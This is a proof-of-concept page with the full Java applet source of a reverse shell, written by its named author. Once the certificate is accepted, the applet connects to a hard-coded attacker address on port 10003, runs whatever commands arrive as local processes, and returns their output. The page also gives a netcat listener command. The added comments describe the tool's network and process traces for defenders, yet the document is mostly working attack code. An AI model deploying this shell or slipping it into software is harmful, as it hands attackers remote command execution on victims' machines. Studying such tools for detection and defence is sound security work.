Proof-of-Concept




Description

This PoC executes a reverse shell on the victim's machine if the victim accepts the certificate.
In this example, the applet tries to connect to the attacker's IP on port 10003 and offers a remote shell.
As the listening server you could use netcat:

  	  nc -vv -l -p 10003



Source code:
import java.io.*;
import java.net.Socket;
import java.util.*;
import java.util.regex.*;
import java.applet.Applet;

/**
 * Proof-of-concept applet. Once loaded, {@link #init()} opens an outbound TCP
 * connection to a hard-coded address and port, then executes each line received
 * on that socket as a local process and writes the process output back to the
 * peer. Nothing received from the peer is validated or restricted.
 *
 * From a defender's point of view the observable behaviour is all in this file:
 * an outbound connection from the browser's JVM to port 10003, a fixed banner
 * string sent on connect, and child processes started by the JVM through
 * {@link ProcessBuilder} with the working directory chosen by the peer.
 */
public class poc extends Applet{
	/**
	 * Author: daniel baier alias duddits
	 * License: GPL
	 * Requirements: JRE 1.5 for running and the JDK 1.5 for compiling or higher
	 * Version: 0.1 alpha release
	 */

	/**
	 * Builds the string used as the next working directory after a "cd " command.
	 *
	 * This is plain string concatenation, not path resolution: {@code start} is
	 * appended to the absolute form of {@code currentDir} with a "/" separator,
	 * whether or not {@code start} is itself absolute, and the result is not
	 * checked for existence here. The caller only reports "not found" if this
	 * method throws, which the code below does not do on its own.
	 *
	 * @param start      the text following "cd " on the received line
	 * @param currentDir the directory the session is currently in
	 * @return {@code currentDir}'s absolute path, a "/", then {@code start}
	 */
	public String cd(String start, File currentDir) {
		File fullPath = new File(currentDir.getAbsolutePath());
		String sparent = fullPath.getAbsoluteFile().toString();
		return sparent + "/" + start;

		}

	/**
	 * Applet entry point. Connects to the hard-coded listener and runs the
	 * command loop until the peer sends "exit" or an exception escapes the loop.
	 *
	 * Every exception, including the connection failure, is caught and silently
	 * discarded at the bottom of this method, so a failed or interrupted session
	 * reports nothing.
	 */
	@SuppressWarnings("unchecked") // raw LinkedList below
	public void init() {
		// A second instance is created only to call cd(); the applet instance itself is not used.
		poc rs = new poc();
		PrintWriter out;
		try {
			// Outbound connection from the victim's JVM to the hard-coded listener address/port.
			Socket clientSocket = new Socket("192.168.5.222",10003);
			out = new PrintWriter(clientSocket.getOutputStream(), true);
			// Fixed banner sent on connect; it is a stable artifact of this tool on the wire.
			out.println("\tJRS 0.1 alpha release\n\tdeveloped by duddits alias daniel baier");
			boolean run = true;
			String s;
			BufferedReader br = new BufferedReader(new InputStreamReader(clientSocket.getInputStream()));
			// Working directory for spawned processes; starts at the filesystem root.
			String startort = "/";
			while (run) {
				String z1;
				File f = new File(startort);
				// Prompt: current directory followed by "> ".
				out.println(f.getAbsolutePath() + "> ");
				// One command per line. readLine() returns null once the peer closes the
				// connection; the matcher/equals calls below then throw a
				// NullPointerException, which lands in the outer catch and ends init().
				s = br.readLine();
				z1 = s;
				// "cd " is recognised with a regex; the same regex is used to split off
				// the argument, so teile1[1] is whatever followed "cd ".
				Pattern pcd = Pattern.compile("^cd\\s");
				Matcher mcd = pcd.matcher(z1);
				String[] teile1 = pcd.split(z1);
				if (s.equals("exit")) {
					run = false;
				}else if (s.equals(null) || s.equals("cmd") || s.equals("")) {
					// "cmd" and empty lines are ignored. Note s.equals(null) is always false
					// for a non-null s and throws for a null s; it never acts as a null check.

				} else if(mcd.find()){
					// Directory change: the new value is used as-is for later ProcessBuilder calls.
					try {
						String cds = rs.cd(teile1[1], new File(startort));
						startort = cds;
						} catch (Exception verz) {
						out.println("Path " + teile1[1]
						+ " not found.");
						}

				}else {

					String z2;


					z2 = s;
					// Any other line is split on whitespace and passed directly to
					// ProcessBuilder, i.e. executed without a shell. That is why the error
					// message below tells the peer to prefix "cmd /c" or "bash -c".
					Pattern pstring = Pattern.compile("\\s");
					String[] plist = pstring.split(z2);

					try {

						LinkedList slist = new LinkedList();
						for (int i = 0; i < plist.length; i++) {
							slist.add(plist[i]);
						}

						// Child process spawned by the browser JVM, with the peer-chosen
						// working directory; its stdin is left unconnected.
						ProcessBuilder builder = new ProcessBuilder(slist);
						builder.directory(new File(startort));
						Process p = builder.start();
						Scanner se = new Scanner(p.getInputStream());
						// stderr is only relayed when stdout produced nothing at all.
						if (!se.hasNext()) {
							Scanner sa = new Scanner(p.getErrorStream());
							while (sa.hasNext()) {
								out.println(sa.nextLine());
							}
						}
						// stdout is streamed line by line; the process is neither waited
						// on nor destroyed afterwards.
						while (se.hasNext()) {
							out.println(se.nextLine());
						}


					} catch (Exception err) {
						// Typically a missing executable (IOException from start()).
						out.println(f.getAbsolutePath() + "> Command "
								+ s + " failed!");
						out.println(f.getAbsolutePath() +"> Please try cmd /c "+ s+" or bash -c " +s+" if this command is an shell buildin.");
					}

				}
			}

			// Reached only after the loop ends via "exit". The socket is not closed
			// here, only the writer, and only if isConnected() reports false (which it
			// does not once a connection has been established).
			if(!clientSocket.isConnected()){
				run = false;
				out.flush();
				out.close();
			}

		} catch (Exception io) {
			// All failures (connection refused, peer hang-up, NullPointerException from
			// the loop) are swallowed here; nothing is logged or reported.
			//System.err.println("Connection refused by peer");
		}

	}

}



Copyright © 2006-2007 Daniel Baier: Alle Rechte vorbehalten